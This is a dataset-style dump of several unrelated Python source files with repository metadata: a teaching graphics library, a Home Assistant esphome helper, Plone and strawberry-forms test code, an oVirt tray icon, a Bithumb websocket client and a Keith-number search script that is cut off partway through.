'fill_color': 'black',
'outline_color': 'black',
'outline_thickness': 1}
def __init__(self, x, y):
"""
:type x: float
:type y: float
"""
super().__init__(tkinter.Canvas.create_oval)
self.fill_color = Point.defaults['fill_color']
self.outline_color = Point.defaults['outline_color']
self.outline_thickness = Point.defaults['outline_thickness']
self.x = x
self.y = y
self.width_for_drawing = Point.defaults['width_for_drawing']
self.height_for_drawing = Point.defaults['height_for_drawing']
def __repr__(self):
""" Returns a string representation of this Point. """
return 'Point({:.1f}, {:.1f})'.format(self.x, self.y)
def clone(self):
""" Returns a copy of this Point. """
return Point(self.x, self.y)
def move_by(self, dx, dy):
"""
Moves this Point to the right by dx and down by dy.
Negative values move it to the left/up instead.
Does NOT return a value; instead, it mutates this Point.
:type dx: float
:type dy: float
"""
self.x = self.x + dx
self.y = self.y + dy
def move_to(self, x, y):
"""
Moves this Point to (x, y).
Does NOT return a value; instead, it mutates this Point.
:type x: float
:type y: float
"""
self.x = x
self.y = y
def get_bounding_box(self):
"""
Returns an rg.Rectangle that encloses
this Point (viewing it as a dot).
"""
c1 = Point(self.x - self.width_for_drawing / 2,
self.y - self.width_for_drawing / 2)
c2 = Point(self.x + self.height_for_drawing / 2,
self.y + self.height_for_drawing / 2)
return Rectangle(c1, c2)
def _get_coordinates_for_drawing(self):
return self.get_bounding_box()._get_coordinates_for_drawing()
class Polygon(_Shape, _ShapeWithOutline):
""" Not yet implemented. """
class Rectangle(_RectangularShape, _ShapeWithOutline):
"""
A Shape that is a rectangle.
To construct a Rectangle, use:
- rg.Rectangle(corner1, corner2)
where corner1 and corner2 are
rg.Point objects that specify opposite
corners of the rectangle.
For example:
- rg.Rectangle(rg.Point(100, 50),
- rg.Point(300, 200))
specifies the rectangle:
- whose upper-left corner is (100, 50) and
- whose lower-right corner is (300, 200).
Another example:
- rg.Rectangle(rg.Point(300, 50),
- rg.Point(100, 200))
specifies the same rectangle.
Any two opposite corners can be used.
Instance variables include:
corner_1: An rg.Point that specifies
one corner of the Rectangle.
corner_2: An rg.Point that specifies
an opposite corner of the Rectangle.
fill_color:
The Rectangle is filled with this color.
Example: rect.fill_color = 'green'
outline_color:
The outline of the Rectangle is this color.
Example: rect.outline_color = 'blue'
outline_thickness: The thickness (in pixels)
of the outline of the Rectangle.
Examples:
p1 = rg.Point(100, 50)
p2 = rg.Point(300, 200)
rect = rg.Rectangle(p1, p2)
print(rect.corner_1, rect.corner_2)
rect.fill_color = 'blue'
rect.outline_color = 'black'
rect.outline_thickness = 5
window = rg.RoseWindow()
rect.attach_to(window)
rect.move_to(300, 200)
rect.move_by(-50, 60)
# Another way to move the Rectangle:
rect.corner_1 = rect.corner_1 - 50
rect.corner_2 = rect.corner_2 + 60
# To get rg.Points for the corners/center:
ul = rect.get_upper_left_corner()
ur = rect.get_upper_right_corner()
ll = rect.get_lower_left_corner()
lr = rect.get_lower_right_corner()
center = rect.get_center()
# To get the width/height (always positive):
h = rect.get_height()
w = rect.get_width()
"""
def __init__(self, corner_1, corner_2):
"""
:type corner_1: rg.Point
:type corner_2: rg.Point
"""
# The following sets instance variables
# self.corner_1
# self.corner_2
# to clones (copies) of the given rg.Points.
super().__init__(corner_1, corner_2,
tkinter.Canvas.create_rectangle)
# The following sets default values for:
# self.fill_color
# self.outline_color
# self.outline_thickness
super()._initialize_options()
def get_bounding_box(self):
"""
Returns a new rg.Rectangle with the same corners as this one.
"""
return self.clone()
class RoundedRectangle(_RectangularShape, _ShapeWithOutline):
""" Not yet implemented. """
class Square(_ShapeWithCenter, _ShapeWithOutline):
"""
A Shape that is an square.
To construct a Square, use:
- rg.Square(center, length_of_each_side)
where center is an rg.Point object
and length_of_each_side is a positive integer.
For example:
- rg.Square(rg.Point(100, 75), 60)
specifies the square whose center
is at (100, 75) and whose length of
each side is 60. Its corners are at:
(70, 35), (70, 105), (130, 35), (130, 105).
Instance variables include:
center: An rg.Point that specifies
the center of the Square.
radius: The length of each side of the Square.
fill_color:
The Square is filled with this color.
Example: square.fill_color = 'green'
outline_color:
The outline of the Square is this color.
Example: square.outline_color = 'blue'
outline_thickness: The thickness (in pixels)
of the outline of the Square.
Examples:
square = rg.Square(rg.Point(100, 75), 60)
print(square.center, square.length_of_each_side)
square.fill_color = 'blue'
square.outline_color = 'black'
square.outline_thickness = 5
window = rg.RoseWindow()
square.attach_to(window)
square.move_center_to(300, 200)
square.move_by(-50, 60)
# Another way to move the Square:
x = square.center.x
y = square.center.y
square.center = rg.Point(x - 50, y + 60)
"""
def __init__(self, center, length_of_each_side):
"""
:type center: rg.Point
:type length_of_each_side: int
"""
# The following sets instance variable
# self.center
# to a clone (copy) of the given rg.Point.
super().__init__(center, tkinter.Canvas.create_rectangle)
# The following sets default values for:
# self.fill_color
# self.outline_color
# self.outline_thickness
super()._initialize_options()
# The length of each side is also stored in an instance variable
self.length_of_each_side = length_of_each_side
def __repr__(self):
""" Returns a string representation of this Square. """
f_string = ''
f_string += 'Square: center=({}, {}), side-lengths={}, '
f_string += 'fill_color={}, outline_color={}, outline_thickness={}.'
return f_string.format(self.center.x, self.center.y,
self.length_of_each_side,
self.fill_color, self.outline_color,
self.outline_thickness)
def clone(self):
""" Returns a copy of this Square. """
return Square(self.center, self.length_of_each_side)
def get_bounding_box(self):
"""
Returns a rg.Rectangle with the same corners as this Square.
"""
c1 = Point(self.center.x - self.length_of_each_side / 2,
self.center.y - self.length_of_each_side / 2)
c2 = Point(self.center.x + self.length_of_each_side / 2,
self.center.y + self.length_of_each_side / 2)
return Rectangle(c1, c2)
def _get_coordinates_for_drawing(self):
return self.get_bounding_box()._get_coordinates_for_drawing()
class Text(_ShapeWithCenter, _ShapeWithText):
"""
A Shape that has a string of text on it, displayed horizontally.
Its constructor specifies the rg.Point at which the text
is centered and the string that is to be displayed.
Public data attributes: center (an rg.Point),
font_size (an integer, 5 to 80 or so are reasonable values),
is_bold (True if the text is to be displayed in BOLD, else False),
is_italic (True or False),
is_underline (True or False),
is _overstrike (True or False),
text_color (color used to display the text, default is 'black')
text (the string to be displayed).
Public methods: attach_to, move_by, move_center_to.
"""
def __init__(self, center, text):
"""
The first argument must be a rg.Point.
The second argument must be a string.
When this Text object is rendered on a window,
the string (2nd argument) is drawn horizontally on the window,
centered at the rg.Point that is the 1st argument.
Preconditions:
:type center: rg.Point
:type text str
"""
super().__init__(center, tkinter.Canvas.create_text)
super()._initialize_options()
self.text = text
# FIXME: Allow __init__ to set the options.
def __repr__(self):
return "Text displaying '{}' at position {}".format(self.text,
self.center)
# FIXME: Have repr include characteristics??
# FIXME: Do a clone?
# def clone(self):
# return Square(self.center, self.length_of_each_side)
# def get_bounding_box(self):
# return Rectangle(self.center,
# 2 * self.length_of_each_side,
# 2 * self.length_of_each_side)
# FIXME: Implement bounding_box using the tkinter function for it.
def _get_coordinates_for_drawing(self):
return [self.center.x, self.center.y]
# Mark: Window/RoseWindow naming collision is causing mass confusion.
# class Window(_Shape):
# """ Not yet implemented. """
# default_options = {}
# CONSIDER: Are these right for here?
class Button(_Shape):
""" Not yet implemented. """
default_options = {}
class Entry(_Shape):
""" Not yet implemented. """
default_options = {}
class Color(object):
"""
A Color represents a fill or outline color created from custom
amounts of red, green, and blue light. The arguments are:
- The RED component (0-255),
- the GREEN component (0-255),
- the BLUE component (0-255).
This Color can be passed to RoseGraphics colors
such as fill_color and outline_color.
"""
def __init__(self, red, green=None, blue=None):
self.red = red
self.green = green
self.blue = blue
def __repr__(self):
return "#{:02x}{:02x}{:02x}".format(self.red, self.green, self.blue)
# begin STUB code for testing
class _RoseWindowStub(RoseWindow):
def __init__(self, width=400, height=300, title='Rose Graphics',
color='black', canvas_color=None,
make_initial_canvas=True):
canvas_color = "white" # FIXME
self._is_closed = False
self.width = width
self.height = height
self.initial_canvas = _RoseCanvasStub(
self, width, height, canvas_color)
def render(self, seconds_to_pause=None):
pass
def get_next_mouse_click(self):
return Point(0, 0)
def close_on_mouse_click(self):
return None
def continue_on_mouse_click(self,
message='To continue, click anywhere in this window',
x_position=None,
y_position=None,
close_it=False,
erase_it=True):
return None
def _serialize_shapes(self):
"""Returns a list of strings representing the shapes in sorted order."""
return _serialize_shapes(self)
class _RoseCanvasStub(RoseCanvas):
def __init__(self, window, width, height, canvas_color):
# super().__init__(window, width, height, canvas_color)
# canvases.append(self)
self.shapes = []
def _draw(self, shape):
# super()._draw(shape)
self.shapes.append(shape)
def render(self, seconds_to_pause=None):
# super().render() # don't pause
pass
class TurtleWindow(object):
def __init__(self):
self._screen = turtle.Screen()
turtle.Turtle._screen = self._screen
def close_on_mouse_click(self):
self._screen.exitonclick()
# We may need the statement:
# turtle.TurtleScreen._RUNNING = True
# in case we open a subsequent TurtleWindow during this run.
# The turtle library seems not to allow for that possibility
# (it uses a CLASS variable _RUNNING where I would have expected
# an INSTANCE variable).
# The next statement appeared to have a visible effect
# (something flashed) but nothing worse. At time time
# it is commented-out, since we need only a single TurtleWindow.
# turtle.TurtleScreen._RUNNING = True
def delay(self, milliseconds=None):
self._screen.delay(milliseconds)
def tracer(self, n=None, delay=None):
self._screen.tracer(n, delay)
class ShapesWindow(RoseWindow):
pass
class SimpleTurtle(object):
"""
A SimpleTurtle is a Turtle with restricted (simpler) functionality.
It can move forward/backward (units are pixels), turn (spin)
left/right (units are degrees), and more.
To construct a SimpleTurtle, use:
rg.SimpleTurtle(shape)
where shape is OPTIONAL and can be any of: 'turtle'
'arrow' 'classic' 'square' 'circle' 'triangle' 'blank'
Instance variables include:
speed: An integer from 1 (slowest) to 10 (fastest) that
determines how fast the SimpleTurtle moves.
pen: an rg.Pen object (see example below) that determines
the color and thickness of the line
that the SimpleTurtle draws when moving
paint_bucket: an rg.PaintBucket object (see example below)
that determines the color with which the SimpleTurtle
"fills" shapes indicated by using the begin_fill and
end_fill methods.
Examples:
natacha = rg.SimpleTurtle()
natacha.forward(100)
boris = rg.SimpleTurtle('turtle')
boris.speed = 8
boris.pen = rg.Pen('blue', 5) # blue line 5 pixels thick
boris.paint_bucket = rg.PaintBucket('red')
# Moves with pen down, then with pen up, then with pen down again:
boris.left(90)
boris.forward(-300)
boris.pen_up()
boris.go_to(rg.Point(100, -50)
boris.pen_down()
boris.backward(75)
# Moves with the enclosed space "filled" with the paint_bucket
boris.begin_fill()
... movements ...
boris.end_fill()
"""
def __init__(self, shape='classic'):
"""
What comes in:
A turtle.Shape that determines how the Turtle looks. Defaults to
a Bitmap of the "classic" Turtle (an arrowhead) from early Turtle Graphics.
Side effects: Constructs and stores in self._turtle the "real" Turtle
to do all the work on behalf of this SimpleTurtle. This (purposely)
restricts what this SimpleTurtle knows and can do.
:type shape: str
"""
self.speed = 1
self.pen = Pen('black', 1)
self.paint_bucket = PaintBucket('black')
self._turtle = turtle.Turtle(shape)
self._update_real_turtle()
def forward(self, distance):
"""
Makes this SimpleTurtle go forward the given distance
(in pixels). Example (assuming sally is an rg.SimpleTurtle):
sally.forward(200)
"""
self._update_real_turtle()
self._turtle.forward(distance)
def backward(self, distance):
"""
Makes this SimpleTurtle go backward the given distance
(in pixels). Example (assuming sally is an rg.SimpleTurtle):
sally.backward(200)
"""
self._update_real_turtle()
self._turtle.backward(distance)
def left(self, angle):
"""
Makes this SimpleTurtle turn (i.e. spin) left the given distance
(in degrees). Example (assuming sally is an rg.SimpleTurtle):
sally.left(45)
"""
self._update_real_turtle()
self._turtle.left(angle)
def right(self, angle):
"""
Makes this SimpleTurtle turn (i.e. spin) right the given distance
(in degrees). Example (assuming sally is an rg.SimpleTurtle):
sally.right(45)
"""
self._update_real_turtle()
self._turtle.right(angle)
def go_to(self, point):
"""
Makes this SimpleTurtle go to the given rg.Point.
(0, 0) is at the center of the window.
Example (assuming sally is an rg.SimpleTurtle):
sally.go_to(rg.Point(100, -50))
"""
self._update_real_turtle()
self._turtle.goto(point.x, point.y)
def draw_circle(self, radius):
"""
Makes this SimpleTurtle draw a circle with the given radius.
Example (assuming sally is an rg.SimpleTurtle):
sally.draw_circle(40)
"""
self._update_real_turtle()
self._turtle.circle(radius)
def draw_square(self, length_of_sides):
"""
Makes this SimpleTurtle draw a square with the given value
for the length of each of its sides.
Example (assuming sally is an rg.SimpleTurtle):
sally.draw_square(100)
"""
for _ in range(4):
self.forward(length_of_sides)
self.left(90)
def draw_regular_polygon(self, number_of_sides, length_of_sides):
"""
Makes this SimpleTurtle draw a regular polygon with the given
number of sides and the given length for each of its sides.
Example (assuming sally is an rg.SimpleTurtle):
sally.draw_polygon(8, 75) # octogon
sally.draw_polygon(3, 75) # triangle
"""
for _ in range(number_of_sides):
self.forward(length_of_sides)
self.left(360 / number_of_sides)
def pen_up(self):
"""
Lifts up this SimpleTurtle's pen. Subsequent movements
will NOT draw a line (until pen_down is called).
Example (assuming sally is an rg.SimpleTurtle):
sally.pen_up()
"""
self._update_real_turtle()
self._turtle.penup()
def pen_down(self):
"""
Puts down this SimpleTurtle's pen. Subsequent movements
WILL draw a line using this SimpleTurtle's pen (until pen_up
is called). Example (assuming sally is an rg.SimpleTurtle):
sally.pen_down()
"""
self._update_real_turtle()
self._turtle.pendown()
def x_cor(self):
"""
Returns the x-coordinate of this SimpleTurtle's current position.
Example (assuming sally is an rg.SimpleTurtle):
x = sally.x_cor()
"""
return self._turtle.xcor()
def y_cor(self):
"""
Returns the y-coordinate of this SimpleTurtle's current position.
Example (assuming sally is an rg.SimpleTurtle):
y = sally.y_cor()
"""
return self._turtle.ycor()
def begin_fill(self):
"""
Begins "filling" the shape that this SimpleTurtle draws,
using this SimpleTurtle's paint_bucket as the fill.
Example (assuming sally is an rg.SimpleTurtle) that fills
a triangle with green:
sally.paint_bucket = rg.PaintBucket('green')
sally.begin_fill()
sally.forward(100)
sally.left(120)
sally.forward(100)
sally.left(120)
sally.forward(100)
sally.end_fill()
"""
self._update_real_turtle()
self._turtle.begin_fill()
def end_fill(self):
"""
Completes "filling" the shape that this SimpleTurtle draws,
using this SimpleTurtle's paint_bucket as the fill.
Example (assuming sally is an rg.SimpleTurtle) that fills
a triangle with green:
sally.paint_bucket = rg.PaintBucket('green')
sally.begin_fill()
sally.forward(100)
sally.left(120)
sally.forward(100)
sally.left(120)
sally.forward(100)
sally.end_fill()
"""
self._update_real_turtle()
self._turtle.end_fill()
def clear(self):
""" Not yet implemented. """
def clone(self):
""" Not yet implemented. """
pass
def write_text(self):
""" Not yet implemented. """
pass
def _update_real_turtle(self):
self._turtle.pencolor(self.pen.color)
self._turtle.pensize(self.pen.thickness)
self._turtle.fillcolor(self.paint_bucket.color)
self._turtle.speed(self.speed)
class Pen(object):
"""
A Pen has a color and thickness.
SimpleTurtles use a Pen for drawing lines.
To construct a Pen, use:
rg.Pen(color, thickness)
where color is a color (e.g. 'red')
and thickness is a small positive integer.
Instance variables are:
color: The color of the Pen
thickness: The thickness of the Pen
Examples:
thick_blue = rg.Pen('blue', 14)
thin_red = rg.Pen('red', 1)
"""
def __init__(self, color, thickness):
self.thickness = thickness
self.color = color
class PaintBucket(object):
"""
A PaintBucket has a color.
SimpleTurtles use a PaintBucket for filling shapes with color.
To construct a PaintBucket, use:
rg.PaintBucket(color)
where color is a color (e.g. 'red').
Instance variables are:
color: The color of the PaintBucket
Example:
paint = rg.PaintBucket('green')
"""
def __init__(self, color):
self.color = color
| [
"[email protected]"
] | |
482928edaa2e06cd3b7bed4f4eaec7daf1bdda60 | 2c74bb301f1ed83b79254944183ac5a18a639fdf | /homeassistant/components/esphome/domain_data.py | 01f0a4d6b1369b6f6908d943c821bb3805e59e57 | [
"Apache-2.0"
] | permissive | Adminiuga/home-assistant | 5bec93007ddac1a268cc359bf7e48530c5f73b38 | dcf68d768e4f628d038f1fdd6e40bad713fbc222 | refs/heads/dev | 2023-02-22T22:03:31.013931 | 2022-11-09T00:27:20 | 2022-11-09T00:27:20 | 123,929,062 | 5 | 4 | Apache-2.0 | 2023-02-22T06:14:31 | 2018-03-05T14:11:09 | Python | UTF-8 | Python | false | false | 2,885 | py | """Support for esphome domain data."""
from __future__ import annotations
from dataclasses import dataclass, field
from typing import TypeVar, cast
from homeassistant.config_entries import ConfigEntry
from homeassistant.core import HomeAssistant
from homeassistant.helpers.json import JSONEncoder
from homeassistant.helpers.storage import Store
from .entry_data import RuntimeEntryData
STORAGE_VERSION = 1
DOMAIN = "esphome"
_DomainDataSelfT = TypeVar("_DomainDataSelfT", bound="DomainData")
@dataclass
class DomainData:
"""Define a class that stores global esphome data in hass.data[DOMAIN]."""
_entry_datas: dict[str, RuntimeEntryData] = field(default_factory=dict)
_stores: dict[str, Store] = field(default_factory=dict)
_entry_by_unique_id: dict[str, ConfigEntry] = field(default_factory=dict)
def get_by_unique_id(self, unique_id: str) -> ConfigEntry:
"""Get the config entry by its unique ID."""
return self._entry_by_unique_id[unique_id]
def get_entry_data(self, entry: ConfigEntry) -> RuntimeEntryData:
"""Return the runtime entry data associated with this config entry.
Raises KeyError if the entry isn't loaded yet.
"""
return self._entry_datas[entry.entry_id]
def set_entry_data(self, entry: ConfigEntry, entry_data: RuntimeEntryData) -> None:
"""Set the runtime entry data associated with this config entry."""
if entry.entry_id in self._entry_datas:
raise ValueError("Entry data for this entry is already set")
self._entry_datas[entry.entry_id] = entry_data
if entry.unique_id:
self._entry_by_unique_id[entry.unique_id] = entry
def pop_entry_data(self, entry: ConfigEntry) -> RuntimeEntryData:
"""Pop the runtime entry data instance associated with this config entry."""
if entry.unique_id:
del self._entry_by_unique_id[entry.unique_id]
return self._entry_datas.pop(entry.entry_id)
def is_entry_loaded(self, entry: ConfigEntry) -> bool:
"""Check whether the given entry is loaded."""
return entry.entry_id in self._entry_datas
def get_or_create_store(self, hass: HomeAssistant, entry: ConfigEntry) -> Store:
"""Get or create a Store instance for the given config entry."""
return self._stores.setdefault(
entry.entry_id,
Store(
hass, STORAGE_VERSION, f"esphome.{entry.entry_id}", encoder=JSONEncoder
),
)
@classmethod
def get(cls: type[_DomainDataSelfT], hass: HomeAssistant) -> _DomainDataSelfT:
"""Get the global DomainData instance stored in hass.data."""
# Don't use setdefault - this is a hot code path
if DOMAIN in hass.data:
return cast(_DomainDataSelfT, hass.data[DOMAIN])
ret = hass.data[DOMAIN] = cls()
return ret
| [
"[email protected]"
] | |
5a1ed0cd70c637628613bcdc2591471ce0eebf24 | b3c8678c1db0b3e256de97e560d7d4d26c1dd6eb | /src/jpl.mcl.site.sciencedata/src/jpl/mcl/site/sciencedata/testing.py | 4325448b2a43549da50926c2e47a4028a8f43d2d | [
"GPL-2.0-only",
"Apache-2.0",
"GPL-1.0-or-later"
] | permissive | MCLConsortium/mcl-site | e4a127235504e7ac5575ef3d73c8fd1bdf02824b | 5eb9c16a7fe322192a03461a9f22ecb8c17307fd | refs/heads/master | 2021-06-09T23:49:35.775652 | 2021-04-30T22:59:59 | 2021-04-30T22:59:59 | 49,965,919 | 1 | 0 | Apache-2.0 | 2020-08-25T15:58:27 | 2016-01-19T16:24:58 | Python | UTF-8 | Python | false | false | 1,896 | py | # encoding: utf-8
from plone.app.testing import PloneSandboxLayer, IntegrationTesting, FunctionalTesting, PLONE_FIXTURE
from . import PACKAGE_NAME
import pkg_resources, urllib2, urllib, httplib, plone.api
class TestSchemeHandler(urllib2.BaseHandler):
u'''A special URL handler for the testing-only scheme ``testscheme``.'''
def testscheme_open(self, req):
try:
selector = req.get_selector()
path = 'tests/data/' + selector.split('/')[-1] + '.json'
if pkg_resources.resource_exists(PACKAGE_NAME, path):
return urllib.addinfourl(
pkg_resources.resource_stream(PACKAGE_NAME, path),
httplib.HTTPMessage(open('/dev/null')),
req.get_full_url(),
200
)
else:
raise urllib2.URLError('Not found')
except Exception:
raise urllib2.URLError('Not found')
class JPLMCLSiteSciencedataLayer(PloneSandboxLayer):
defaultBases = (PLONE_FIXTURE,)
def setUpZope(self, app, configurationContext):
import jpl.mcl.site.sciencedata
self.loadZCML(package=jpl.mcl.site.sciencedata)
urllib2.install_opener(urllib2.build_opener(TestSchemeHandler))
def setUpPloneSite(self, portal):
wfTool = plone.api.portal.get_tool('portal_workflow')
wfTool.setDefaultChain('plone_workflow')
self.applyProfile(portal, 'jpl.mcl.site.sciencedata:default')
JPL_MCL_SITE_SCIENCEDATA_FIXTURE = JPLMCLSiteSciencedataLayer()
JPL_MCL_SITE_SCIENCEDATA_INTEGRATION_TESTING = IntegrationTesting(
bases=(JPL_MCL_SITE_SCIENCEDATA_FIXTURE,),
name='JPLMCLSiteSciencedataLayer:IntegrationTesting'
)
JPL_MCL_SITE_SCIENCEDATA_FUNCTIONAL_TESTING = FunctionalTesting(
bases=(JPL_MCL_SITE_SCIENCEDATA_FIXTURE,),
name='JPLMCLSiteSciencedataLayer:FunctionalTesting'
)
| [
"[email protected]"
] | |
d555da4df0ff92fad94428138c04e5725366861c | 47542e6b98c19592f44ce44297771c698d4987f7 | /ch09/09_08.py | 42a496a958555522889a656ddd4e96b4f567131b | [
"Apache-2.0"
] | permissive | sharebook-kr/book-cryptocurrency | 235b6998668265ec804451afddd245a52824f51a | 847ba97ba096c257b35f5e507cd33fa6a0724860 | refs/heads/master | 2022-12-14T05:24:52.765589 | 2022-11-30T01:35:08 | 2022-11-30T01:35:08 | 128,632,349 | 162 | 141 | Apache-2.0 | 2022-11-30T01:35:09 | 2018-04-08T11:05:17 | Python | UTF-8 | Python | false | false | 301 | py | import websockets
import asyncio
async def bithumb_ws_client():
uri = "wss://pubwss.bithumb.com/pub/ws"
async with websockets.connect(uri) as websocket:
greeting = await websocket.recv()
print(greeting)
async def main():
await bithumb_ws_client()
asyncio.run(main()) | [
"[email protected]"
] | |
9a4b55c49ddbd6bf15ee9f95c0e49e1c0aa461d2 | 0c7e54178e89a4dad98deb8265c2cb41ca3399b9 | /backend/strawberry_forms/tests/test_mutations.py | 470971ab95ea4f9bf7f8c47ae52ac75af4feafda | [
"MIT"
] | permissive | marlenebDC/pycon | 4394bf7a0aecc5aa8ae0b378900d86c2afc7fab7 | 175f2ee9e8698bbcf15dd33d2eb4739fee04c6d7 | refs/heads/master | 2023-07-07T00:34:39.932779 | 2020-01-21T01:00:24 | 2020-01-21T01:00:24 | 235,290,754 | 0 | 0 | MIT | 2023-06-23T23:35:11 | 2020-01-21T08:30:15 | null | UTF-8 | Python | false | false | 1,670 | py | import strawberry
from django.forms import Form, IntegerField
from strawberry_forms.mutations import FormMutation
def test_form_mutation_without_context():
class TestForm(Form):
a = IntegerField()
def save(self, *args, **kwargs):
return "hello"
class TestMutation(FormMutation):
class Meta:
form_class = TestForm
@strawberry.input
class TestInput:
a: int
assert TestMutation.Mutation(None, TestInput(a=1)) == "hello"
def test_form_mutation_response_can_be_converted_using_transform_method():
class TestForm(Form):
a = IntegerField()
def save(self, *args, **kwargs):
return "hello"
class TestMutation(FormMutation):
@classmethod
def transform(cls, result):
return "world"
class Meta:
form_class = TestForm
@strawberry.input
class TestInput:
a: int
assert TestMutation.Mutation(None, TestInput(a=1)) == "world"
def test_form_mutation_transform_is_not_required():
class TestForm(Form):
a = IntegerField()
def save(self, *args, **kwargs):
return "hello"
class TestMutation(FormMutation):
class Meta:
form_class = TestForm
@strawberry.input
class TestInput:
a: int
assert TestMutation.Mutation(None, TestInput(a=1)) == "hello"
def test_mutation_without_input():
class TestForm(Form):
def save(self, *args, **kwargs):
return "ciao"
class TestMutation(FormMutation):
class Meta:
form_class = TestForm
assert TestMutation.Mutation(None) == "ciao"
| [
"[email protected]"
] | |
225c14407e2eba431953f219ed8ecc4582a965c5 | 8b54570140861ffbe464e244f9f49ba55e341577 | /linux/ovirt-guest-tray.py | cdc740419735bb0eb6c99bfa8f3a70c09adf3c55 | [
"Apache-2.0"
] | permissive | vinzenz/ovirt-guest-agent-tray | 36569d149b7082e8129fbe5c462869bfeb8bf779 | 581a73f3ff4431a6a17f6ff9bc3d64f2b23ff586 | refs/heads/master | 2016-09-06T07:41:07.988384 | 2014-07-30T13:55:46 | 2014-07-30T13:57:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,422 | py | #!/usr/bin/env python
import gtk
class TrayIcon:
def __init__(self, *args, **kwargs):
self.icon = gtk.StatusIcon()
self.icon.set_from_file('ovirt-icon-48.svg')
self.icon.connect('popup-menu', self.on_popup_menu)
def on_about(self, *args, **kwargs):
dlg = gtk.Dialog("About the oVirt Guest Agent",
None,
gtk.DIALOG_MODAL | gtk.DIALOG_DESTROY_WITH_PARENT,
(gtk.STOCK_OK, gtk.RESPONSE_ACCEPT))
label1 = gtk.Label("oVirt Guest Agent for Linux")
label1.show()
label2 = gtk.Label("Version 3.6.0")
label2.show()
label3 = gtk.Label("oVirt Guest Agent is running.")
label3.show()
sw = gtk.ScrolledWindow()
sw.set_policy(gtk.POLICY_AUTOMATIC, gtk.POLICY_AUTOMATIC)
sw.set_shadow_type(gtk.SHADOW_ETCHED_IN)
textview = gtk.TextView()
textview.set_editable(False)
textview.set_cursor_visible(False)
textview.set_sensitive(False)
sw.add(textview)
buffer = textview.get_buffer()
lic = '<Copyright information here>'
try:
f = open('/usr/share/ovirt-guest-agent/COPYING', 'r')
lic = f.read()
f.close()
except (OSError,IOError):
pass
buffer.insert(buffer.get_end_iter(), lic)
textview.show()
sw.show()
dlg.vbox.set_homogeneous(False)
dlg.vbox.pack_start(label1, fill=False, expand=False, padding=4)
dlg.vbox.pack_start(label2, fill=False, expand=False, padding=4)
dlg.vbox.pack_start(sw, fill=True, expand=True, padding=4)
dlg.vbox.pack_start(label3, fill=False, expand=False, padding=4)
dlg.set_default_size(640, 480)
dlg.run()
dlg.destroy()
def on_popup_menu(self, icon, event_button, event_time):
menu = gtk.Menu()
about = gtk.MenuItem('About')
about.show()
about.connect('activate', self.on_about)
menu.append(about)
sep = gtk.SeparatorMenuItem()
sep.show()
menu.append(sep)
quit = gtk.MenuItem('Quit')
quit.show()
menu.append(quit)
quit.connect('activate', gtk.main_quit)
menu.popup(None, None, gtk.status_icon_position_menu, event_button, event_time, self.icon)
if __name__ == '__main__':
icon = TrayIcon()
gtk.main()
| [
"[email protected]"
] | |
d5cab9a4b1e7e1be3cf13dddebae13f6a4066b74 | 1d9a6406c859fda186f520bb4472c551fc572c7b | /src/hopla/hoplalib/zoo/petcontroller.py | b5f9e7d0243348d6b233bab73bbf200a2f76e11e | [
"Apache-2.0"
] | permissive | rickie/hopla | af21b794ce6719d402721550e1ee4091790410b6 | 24a422194e42c03d5877dc167b2b07147326a595 | refs/heads/main | 2023-08-13T17:33:03.612293 | 2021-10-12T12:13:25 | 2021-10-12T12:13:25 | 408,538,704 | 0 | 0 | Apache-2.0 | 2021-09-20T17:30:15 | 2021-09-20T17:30:15 | null | UTF-8 | Python | false | false | 2,211 | py | """
A module for performing feeding Pet HTTP requests.
"""
from typing import NoReturn, Optional, Union
import requests
from hopla.hoplalib.http import HabiticaRequest, UrlBuilder
from hopla.hoplalib.zoo.feed_clickhelper import get_feed_data_or_exit
from hopla.hoplalib.zoo.zoofeed_algorithms import FeedPlanItem
class FeedPostRequester(HabiticaRequest):
"""
The FeedPostRequester sends a post request to feed a pet.
Note: this API endpoint expects query params instead
of a request body (even though it is a HTTP POST).
[APIDOCS](https://habitica.com/apidoc/#api-User-UserFeed)
"""
_DEFAULT_FOOD_AMOUNT = 1
def __init__(self, *,
pet_name: str,
food_name: str,
food_amount: Optional[int] = _DEFAULT_FOOD_AMOUNT):
self.pet_name = pet_name
self.food_name = food_name
self.query_params = {
"amount": food_amount or FeedPostRequester._DEFAULT_FOOD_AMOUNT
}
@property
def path(self) -> str:
"""Return the URL used to feed a pet"""
return f"/user/feed/{self.pet_name}/{self.food_name}"
@property
def feed_pet_food_url(self) -> str:
"""Return the url to feed a pet"""
return UrlBuilder(path_extension=self.path).url
def post_feed_request(self) -> requests.Response:
"""Performs the feed pet post requests and return the response"""
return requests.post(url=self.feed_pet_food_url, headers=self.default_headers,
params=self.query_params)
def post_feed_request_get_data_or_exit(self) -> Union[NoReturn, dict]:
"""
Performs the feed pet post requests and return
the feed response if successful. Else exit
:return:
"""
response: requests.Response = self.post_feed_request()
return get_feed_data_or_exit(response)
@classmethod
def build_from(cls, feed_item: FeedPlanItem) -> "FeedPostRequester":
"""Create a request from a feed plan item."""
return FeedPostRequester(
pet_name=feed_item.pet_name,
food_name=feed_item.food_name,
food_amount=feed_item.times
)
| [
"[email protected]"
] | |
e1461c6411425ee974d36267c209f92b7be55c59 | f6188c0c27da8d2507e832908ba9de524f0b907d | /client_speed_test.py | b23314ac7daa63ea09593b18003d1800d1583546 | [] | no_license | lforet/repfibdigit | df1df2fe2ba40ede9662120ea94f7d529f5d4abc | 945ce755fd2526a1a3e242b909b93a79ac4e65fb | refs/heads/master | 2021-01-10T08:43:11.123781 | 2018-12-21T05:32:45 | 2018-12-21T05:32:45 | 8,490,162 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,997 | py | #!/usr/bin/python # This is client.py file
#System modules
import os
import time
import itertools
import cPickle as pickle
import numpy as np
#import cProfile
import timeit
import uuid
import sys
import fib
########################################################################
pgbreak = "-----------------------------------------------"
#----------------------------------------------------------------------
def is_repfibdigit( number_to_test):
n = map(int,str(number_to_test))
while number_to_test > n[0]:
n=n[1:]+[sum(n)]
if (number_to_test == n[0]) & (number_to_test>9):
show_proof(number_to_test)
#raw_input()
#time.sleep(1)
#else:
# print number_to_test, " is NOT a Keith Number"
return
def is_repfibdigit2( number_to_test):
if fib.is_repfibdigit(number_to_test) == True:
show_proof(number_to_test)
#raw_input()
#time.sleep(1)
#else:
# print number_to_test, " is NOT a Keith Number"
return
#this function is to get around the 32bit native int barrier
#not needed in 64 native systems
def my_xrange( start, stop, step):
i = start
while i < stop:
yield i
i += step
def show_proof(kn):
print '---------------------------------------------'
